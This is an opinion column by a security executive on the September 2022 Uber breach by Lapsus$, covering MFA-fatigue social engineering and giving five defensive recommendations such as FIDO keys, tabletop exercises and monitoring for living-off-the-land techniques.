On September 15, the New York Times reported that Uber suffered a breach. Uber acknowledged a cybersecurity incident that same day and provided a detailed update on September 19, stating that a contractor's account was compromised, and "it is likely that the attacker purchased the contractor's Uber corporate password on the dark web."
The adversary socially engineered the victim to approve a two-factor authentication (2FA) request, resulting in the attacker's initial access. The attacker was able to elevate privileges and gain access to a wide array of Uber's applications and environments, including AWS, Google Workspace, HackerOne, OpenDNS, SentinelOne, and Slack. Uber attributed the intrusion to Lapsus$, the threat group that initially extorted groups in South America before targeting global companies such as Microsoft, NVIDIA, Samsung, and T-Mobile.
What lessons can security leaders take away from this developing incident? Before I get into what security teams should do, let's talk about what they shouldn't do.
First, don't victim blame: employees and contractors who fall prey to social engineering are simply trying to do their jobs. They aren't cybersecurity experts who know the latest threat actor tactics, techniques, and procedures (TTPs). Set colleagues and peers up for success with the processes and technology that let them make the right security decisions.
Second, don't have a false sense of security around multi-factor authentication (MFA). Attackers can exploit SMS-based authentication via SIM swapping attacks where the threat actor convinces the mobile carrier to update the SIM card of the victim to the attacker. The bad guys can also use adversary-in-the-middle (AiTM) phishing to bypass MFA as well by targeting the session cookie of the victims. Microsoft released a report detailing an AiTM campaign targeting more than 10,000 organizations. Simply put, traditional approaches to MFA aren't enough.
So how should security leaders respond to the Uber breach? Here are my five recommendations:
- Traditional MFA doesn't work, so put the company on a FIDO U2F or a passwordless FIDO2 journey. The second authentication factor becomes something the person has, a hardware-based token like YubiKey or NFC on a mobile device which protects against SIM swapping and AiTM attacks. Expect user experience tradeoffs with physical devices, so focus on employees with administrative access. No matter which approach the company selects, start small, validate, and expand.
- Conduct a tabletop exercise with Lapsus$ as the opposing force. Several vendors have documented the Lapsus$ TTPs. How well does the company stand up to their social engineering techniques? Can the team detect their lateral movement? Tabletops don't cost the company anything but time. CISA offers tabletop exercise packages that security teams can adopt for their organizations.
- Conduct a living-off-the-land risk assessment. We know adversaries leverage legitimate tools. Can the security team detect misuse? AD Explorer, Microsoft HTML Applications (HTA), PowerShell, Scheduled Tasks, and Windows Management Instrumentation are a few Windows tools that adversaries leverage to live-off-the-land. Also, assess the company’s endpoint management solutions like JAMF, ManageEngine, SolarWinds, and EDR tools. Harden them and ensure the team has logging in place. Remember, "logs, or it didn't happen."
- Review the hardening guidelines for the company’s MFA tools. Does the organization follow the provider's best practices? Reach out to the Customer Success team for recommendations. Consider a professional services engagement to assess and improve the organization’s implementation. A health check costs far less than the costs associated with an intrusion.
- Make sure security has a strong position in 2023 budget planning. Take this opportunity to include recommendations from the tabletop exercise and risk assessments for next year’s budget proposal. Take full advantage of existing detective and preventive controls before investing in a new solution; don't take an "expense-in-depth" approach. Also, include the people aspect in the planning. Does the company need to level-up and train administrators so they can properly configure the solutions they manage? Does the company need to level-up its threat hunting teams so they can quickly identify malicious activity?
Uber's environment isn't dissimilar from most global companies, and many companies are vulnerable to similar attacks. Take the lessons from this event and add more resilience to the organization’s security program.
Rick Holland, chief information security officer, vice president of strategy, Digital Shadows